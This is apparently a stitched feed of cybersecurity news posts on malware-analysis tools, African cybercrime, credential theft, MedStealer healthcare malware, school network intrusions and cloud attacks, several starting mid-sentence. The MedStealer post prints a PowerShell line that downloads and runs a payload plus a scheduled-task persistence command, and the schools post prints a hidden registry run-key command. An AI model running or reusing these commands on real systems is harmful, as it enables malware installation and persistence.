
🔗 Try ANY.RUN here → ANY.RUN Official Website

6. PEStudio

PEStudio is a static analysis tool for Windows executable files (PE files) widely used by malware analysts, security researchers, and software developers.

It provides a comprehensive overview of an executable’s properties, including headers, imports, exports, sections, strings, and digital signatures, helping to detect suspicious artifacts and potential security risks.

Specifications:

• OS: Windows
• Analysis: Static
• API: No
• Deployment: Local

Features:

• Analyzes PE files for anomalies
• Detects obfuscation, suspicious imports, and indicators of compromise
• No installation required (portable)

Reason to Buy:

• Fast, efficient static analysis
• Great for triaging large numbers of samples
• Freeware

Best For: Static analysis of Windows executables

🔗 Try PEStudio here → PEStudio Official Website

7. Process Monitor (ProcMon)

Process Monitor is an advanced Windows monitoring tool that provides real-time visibility into file system, Registry, and process/thread activities.

It combines features from older utilities like Filemon and Regmon, offering powerful filtering, detailed event properties, and the ability to capture thread stacks to help identify root causes of system operations.

Specifications:

• OS: Windows
• Analysis: Dynamic
• API: No
• Deployment: Local

Features:

• Monitors and logs system calls
• Filters and highlights suspicious activity
• Exports logs for further analysis

Reason to Buy:

• Deep visibility into malware behavior
• Free and widely trusted
• No installation required

Best For: Monitoring system activity during malware execution

🔗 Try Process Monitor here → ProcMon Official Website

8. Wireshark

Wireshark is a free and open-source network packet analyzer widely used for capturing and inspecting the details of network traffic in real time.

It allows users to troubleshoot network issues, analyze protocols, and investigate security incidents by providing a detailed, human-readable view of data packets traversing a network.

Specifications:

• OS: Windows, Linux, Mac
• Analysis: Dynamic (Network)
• API: No
• Deployment: Local

Features:

• Captures and analyzes live network traffic
• Supports hundreds of protocols
• Filters and decodes suspicious communications
• Exports PCAP files for sharing

Reason to Buy:

• Essential for analyzing C2 and exfiltration traffic
• Free and open-source
• Cross-platform support

Best For: Network traffic analysis and threat hunting

🔗 Try Wireshark here → Wireshark Official Website

9. Ghidra

Ghidra is a free and open-source software reverse engineering (SRE) tool developed by the U.S. National Security Agency (NSA).

It enables analysts to disassemble, decompile, and analyze compiled code across various platforms, making it a preferred choice for malware analysis and vulnerability research.

Specifications:

• OS: Windows, Linux, Mac
• Analysis: Static (Reverse Engineering)
• API: Yes (Scripting)
• Deployment: Local

Features:

• Disassembles and decompiles binaries
• Supports scripting for automation
• Handles complex malware samples

Reason to Buy:

• Free alternative to expensive commercial tools
• Highly extensible and scriptable
• Supports a wide range of architectures

Best For: Advanced reverse engineering of malware binaries

🔗 Try Ghidra here → Ghidra Official Website

10. x64dbg

x64dbg is a free and open-source debugger for Windows that supports both 64-bit (x64) and 32-bit (x86) binaries.

It is widely used by reverse engineers, malware analysts, and security researchers to step through code, analyze assembly instructions, and understand the behavior of compiled applications without access to their source code.

Specifications:

• OS: Windows
• Analysis: Static (Debugging)
• API: No
• Deployment: Local

Features:

• User-friendly GUI for debugging
• Supports both x86 and x64 binaries
• Plugin support for extended functionality

Reason to Buy:

• Free, modern alternative to OllyDbg
• Powerful for unpacking and analyzing packed malware
• Community-driven development

Best For: Debugging and unpacking Windows malware

🔗 Try x64dbg here → x64dbg Official Website

Conclusion

These top 10 free malware analysis tools provide a comprehensive toolkit for anyone tasked with breaking down malware samples in 2025.

From automated sandboxes and static analyzers to advanced reverse engineering suites, each tool brings unique strengths to the fight against cyber threats.

Integrate them into your workflow to stay ahead of evolving malware and protect your organization’s digital assets.

The post 10 Best Free Malware Analysis Tools To Break Down The Malware Samples – 2025 appeared first on Cyber Security News.

This alarming statistic represents a dramatic shift in the continent’s threat landscape, where two-thirds of African member countries now report that cyber-related offenses constitute a medium-to-high share of all criminal activities.

The emergence of sophisticated cyber threats has transformed the digital security paradigm across the continent, with online scams, ransomware attacks, business email compromise schemes, and digital sextortion campaigns leading the charge.

These attacks have evolved from opportunistic strikes to highly organized criminal enterprises that exploit Africa’s rapidly expanding digital infrastructure and increasing internet penetration rates.

The threat actors behind these campaigns have demonstrated remarkable adaptability, leveraging artificial intelligence and machine learning technologies to enhance their attack vectors and evade traditional detection mechanisms.

Perhaps most concerning is the exponential growth rate of these cyber threats, with suspected scam notifications rising by up to 3,000 percent in some African countries over the past year.

INTERPOL analysts identified this surge as part of a broader pattern of cybercriminal organizations targeting the continent’s emerging digital economies, taking advantage of gaps in cybersecurity infrastructure and law enforcement capabilities.

The scope and sophistication of these attacks have prompted urgent calls for enhanced international cooperation and coordinated response strategies.

Neal Jetton, INTERPOL Cybercrime Director, emphasized the urgency of the situation, stating that the assessment “paints a clear picture of a threat landscape in flux, with emerging dangers like AI-driven fraud that demand urgent attention”.

The report reveals that 90 percent of African countries acknowledge needing significant improvement in their law enforcement or prosecution capacity to address these evolving threats.

This capacity gap has created an environment where cybercriminals can operate with relative impunity, establishing Africa as both a target and a launching pad for international cybercrime operations.

The financial and social impact of these cyber attacks extends far beyond immediate monetary losses, affecting critical infrastructure, government operations, and citizen trust in digital services.

Ambassador Jalel Chelba, Acting Executive Director of AFRIPOL, noted that “cybersecurity has become a fundamental pillar of stability, peace, and sustainable development in Africa,” directly impacting “the digital sovereignty of states, the resilience of institutions, citizen trust and the proper functioning of economies”.

Ransomware Campaign Analysis: Infrastructure Targeting and Persistence Mechanisms

The ransomware threat landscape in Africa has demonstrated unprecedented growth, with detection rates revealing the concentrated nature of these attacks across key economic hubs.

South Africa leads with 17,849 ransomware detections in 2024, followed by Egypt with 12,281 detections, Nigeria with 3,459, and Kenya with 3,030 cases.

These statistics illuminate a clear pattern where cybercriminals are strategically targeting nations with advanced digital infrastructure and significant economic activity.

The attack methodology employed by these ransomware groups reveals sophisticated understanding of African infrastructure vulnerabilities.

Critical infrastructure breaches, such as the attack on Kenya’s Urban Roads Authority (KURA), demonstrate how threat actors are moving beyond traditional targets to disrupt essential services.

Similarly, the compromise of Nigeria’s National Bureau of Statistics (NBS) database highlights the strategic value these attackers place on government data repositories.

These incidents suggest that ransomware operators are conducting extensive reconnaissance phases, identifying high-value targets within government and infrastructure sectors before deploying their payloads.

The persistence mechanisms observed in these campaigns indicate advanced operational security practices.

While specific code analysis remains limited due to the evolving nature of these threats, security researchers have noted the increasing use of living-off-the-land techniques, where attackers leverage legitimate system tools to maintain persistence and avoid detection.

The integration of AI-driven fraud capabilities into these ransomware campaigns represents a concerning evolution, as traditional signature-based detection systems struggle to identify dynamically generated attack patterns.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now

The post INTERPOL Warns of Sharp Rise in Cyber Attacks Targeting Western and Eastern Africa appeared first on Cyber Security News.

The technology giant’s collaboration with Morning Consult has unveiled alarming statistics showing that one-third of Americans have personally experienced data breaches, while malicious actors have intensified their efforts to compromise user credentials through sophisticated social engineering techniques.

The threat landscape has evolved significantly, with cybercriminals employing multiple attack vectors to harvest login credentials from unsuspecting users.

Text message-based scams have emerged as the primary attack method, though 61% of respondents reported being targeted through email campaigns designed to steal personal information.

These attacks typically involve urgent requests for sensitive data, suspicious links, and carefully crafted phishing attempts that mimic legitimate services to deceive users into surrendering their authentication credentials.

Google analysts and researchers have identified a critical shift in how different demographic groups respond to these evolving threats.

The company’s security team noted that while over 80% of users report feeling confident in their ability to spot scams by recognizing requests for personal information and suspicious links, the actual implementation of robust security measures varies dramatically across age groups.

This disparity in security adoption has created vulnerabilities that cybercriminals are actively exploiting to gain unauthorized access to user accounts.

The FBI’s latest data supports Google’s findings, revealing that online scams generated a record $16.6 billion in losses last year, representing a 33% increase from the previous year.

This exponential growth in cybercriminal revenue demonstrates the effectiveness of their credential theft operations and highlights the urgent need for enhanced security measures across all digital platforms.

Authentication Method Vulnerabilities and Generational Security Gaps

The survey data reveals a concerning security paradox where traditional authentication methods continue to dominate despite their inherent vulnerabilities to credential theft attacks.

Over 60% of Generation X and Baby Boomers still rely primarily on password-based authentication systems, creating significant attack surfaces for cybercriminals who have developed sophisticated techniques to compromise these legacy security mechanisms.

Google’s research indicates that while these older authentication methods may feel familiar to users, they are increasingly susceptible to phishing attacks and data breaches that expose login credentials to malicious actors.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests

The post Google Warns of Cybercriminals Increasingly Attacking US Users to Steal Login Credentials appeared first on Cyber Security News.

Among the most insidious threats was MedStealer, a malware strain that targeted electronic health records (EHRs), insurance databases, and patient portals.

First observed in early 2024, MedStealer exploited vulnerabilities in legacy healthcare IT systems and third-party vendor networks.

Attack vectors ranged from phishing campaigns impersonating medical platforms like Zocdoc to SQL injection attacks on unpatched servers.

The malware’s primary objective was to exfiltrate personally identifiable information (PII), insurance details, and medical histories, which were later sold on dark web markets for premiums exceeding $1,000 per record.

Check Point researchers identified MedStealer’s distribution network, which relied heavily on spear-phishing emails disguised as appointment confirmations or prescription notifications.

These emails contained malicious PDF attachments embedded with JavaScript droppers.

Once opened, the script initiated a PowerShell command to download the malware payload from a command-and-control (C2) server.

The campaign’s success stemmed from its use of geofencing-targeting users based in the U.S.-and leveraging compromised healthcare employee credentials to bypass email filters.

The fallout was catastrophic: stolen data fueled insurance fraud, illicit prescription drug sales, and even life-threatening medical errors when EHRs were altered.

Hospitals reported delays in treatments due to system lockdowns, while patients faced identity theft lawsuits and extortion attempts.

Infection Mechanism: Blending Social Engineering with Obfuscated Code

MedStealer’s infection chain combined psychological manipulation with advanced technical evasion. A typical attack began with a phishing email titled “Your Appointment is Ready!”, which included a fake medical ID and urgency to act.

The attached PDF used a Base64-encoded URL to fetch the payload:-

$payloadUrl = "hxxps://healthportal[.]care/update.php?ID=ZXhhbXBsZS1iYWQN";
Invoke-WebRequest -Uri $payloadUrl -OutFile $env:Temp\med_update.exe; Start-Process $env:Temp\med_update.exe

The malware employed process hollowing to inject itself into legitimate Windows utilities like svchost.exe, evading endpoint detection.

Check Point analysts noted that MedStealer’s authors used DNS tunneling to exfiltrate data, disguising stolen records as benign HTTPS traffic.

For persistence, the malware created a scheduled task named “HealthMonitor”:-

schtasks /create /tn "HealthMonitor" /tr "C:\Windows\System32\med_update.exe" /sc hourly /mo 12

Notably, MedStealer exploited vulnerabilities in DICOM protocols (used for medical imaging), allowing lateral movement within hospital networks.

Attackers leveraged misconfigureded PACS (Picture Archiving and Communication Systems) to deploy ransomware alongside data theft tools.

The surge in healthcare breaches underscores the need for zero-trust architectures and AI-driven anomaly detection.

Check Point’s Harmony Email & Collaboration suite blocked over 7,000 MedStealer-linked phishing attempts in 2024, highlighting the critical role of adaptive email security.

As cyber criminals refine their tactics, healthcare organizations must prioritize patch management, employee training, and multi-layered threat prevention to safeguard sensitive patient data.

How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers

The post Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024 appeared first on Cyber Security News.

Recent network intrusions targeting multiple schools and universities in the state have raised significant concerns about digital security in educational environments.

These sophisticated attacks have disrupted administrative systems while carefully avoiding interference with student learning platforms, suggesting a strategic approach by the threat actors.

The attacks typically begin with unauthorized network activity during evening hours or weekends when monitoring may be reduced.

Security experts note that the intrusions follow a pattern of lateral movement through administrative networks, with attackers establishing persistence while carefully avoiding detection.

This methodical approach allows for extended access to potentially sensitive systems without triggering immediate alerts that would come from disrupting student-facing services.

Coweta School System analysts identified similar patterns in their own security incident, noting that the attack methodology shows striking similarities to those targeting New Mexico institutions.

Their investigation revealed that threat actors specifically targeted administrative networks while deliberately leaving student-accessible systems – including Chromebooks, WiFi access, and communication tools – operational to delay detection.

“The network intrusion is serious, and is being investigated by the school system and a number of security partners,” according to official statements.

The incidents have been reported to appropriate authorities, including state emergency management agencies and Homeland Security.

Schools have implemented established security protocols, taking affected systems offline while maintaining educational operations.

Attack Vector Analysis

The primary infection vector appears to be compromised administrator credentials, obtained through social engineering campaigns targeting staff members.

Once gaining initial access, attackers deploy a modified remote access trojan with persistence capabilities.

A typical attack sequence involves a PowerShell command like:-

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "New-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name 'SystemServiceHost' -Value 'powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -File %TEMP%\service.ps1' -Force"

This command establishes persistence by creating a registry run key that executes a hidden PowerShell script on startup.

The malware then maintains a low profile, carefully exfiltrating data while avoiding detection by security monitoring tools.

While investigations continue, schools are implementing enhanced security measures while ensuring that critical educational functions remain operational, including scheduled testing and student access to learning resources.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.

The post Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico appeared first on Cyber Security News.

This alarming statistic emerges from comprehensive research conducted across ten countries, highlighting the increasing vulnerability of organizations as they transition from on-premises systems to hybrid cloud infrastructures.

The study, which surveyed more than 1,600 IT and security leaders, reveals that despite increased investment in cloud security, threat actors continue to find success in breaching these environments.

The nature of cloud-targeted attacks has evolved dramatically, with adversaries shifting away from traditional malware-based approaches toward more sophisticated identity-based intrusion methods.

According to the research, malware-free activity now accounts for 79% of all detected intrusions, a significant increase from just 40% in 2019.

This paradigm shift reflects attackers’ adaptation to modern enterprise environments, where they increasingly exploit valid credentials, engage in hands-on-keyboard intrusions, and deploy social engineering tactics to bypass conventional security measures.

The impact of these breaches has been severe, with 86% of organizations that experienced ransomware attacks ultimately paying the demanded ransom to recover their data or halt the attack.

Even more concerning, 74% of victims reported that attackers were able to harm backup and recovery options, effectively eliminating safety nets designed to mitigate such incidents.

Rubrik Zero Labs researchers identified a particularly troubling trend in their analysis: the dramatic reduction in “breakout time” – the period between initial compromise and lateral movement across systems.

“In 2024, the average breakout time for interactive eCrime intrusions fell to 48 minutes, down from 62 minutes in 2023,” noted security analysts.

“Alarmingly, the fastest breakout was recorded at just 51 seconds, meaning defenders may have less than a minute to detect and respond before attackers establish deeper control”.

The Rise of Identity-Based Attack Vectors

The report provides detailed insight into how identity-based attacks have become the preferred method for cloud environment infiltration.

Rather than breaking in through security vulnerabilities, attackers are simply logging in using compromised credentials.

This approach proves particularly effective in cloud and SaaS environments where traditional perimeter defenses offer limited protection.

Valid account abuse was responsible for 35% of cloud-related incidents, reflecting attackers’ growing focus on identity compromise as a gateway to broader enterprise environments.

Microsoft’s security telemetry supports this finding, revealing that they block over 600 million identity-based attacks daily.

These attacks typically begin with credential harvesting through phishing campaigns or purchase of stolen credentials from access brokers, whose activity surged by nearly 50% compared to the previous year.

The attack sequence typically progresses as follows:-

Initial Access (compromised credentials) → 
    Cloud Environment Access → 
        Lateral Movement (using management tools) → 
            Privilege Escalation → 
                Data Discovery & Exfiltration

To counter this growing threat, the report recommends organizations adopt a comprehensive strategy that includes improved visibility into cloud environments, identity protection measures, and robust backup capabilities that mirror the rigor traditionally applied to on-premises systems.

Without this unified approach to data protection, organizations remain vulnerable to increasingly sophisticated cloud-targeted attacks that move at unprecedented speed.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy

The post Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments appeared first on Cyber Security News.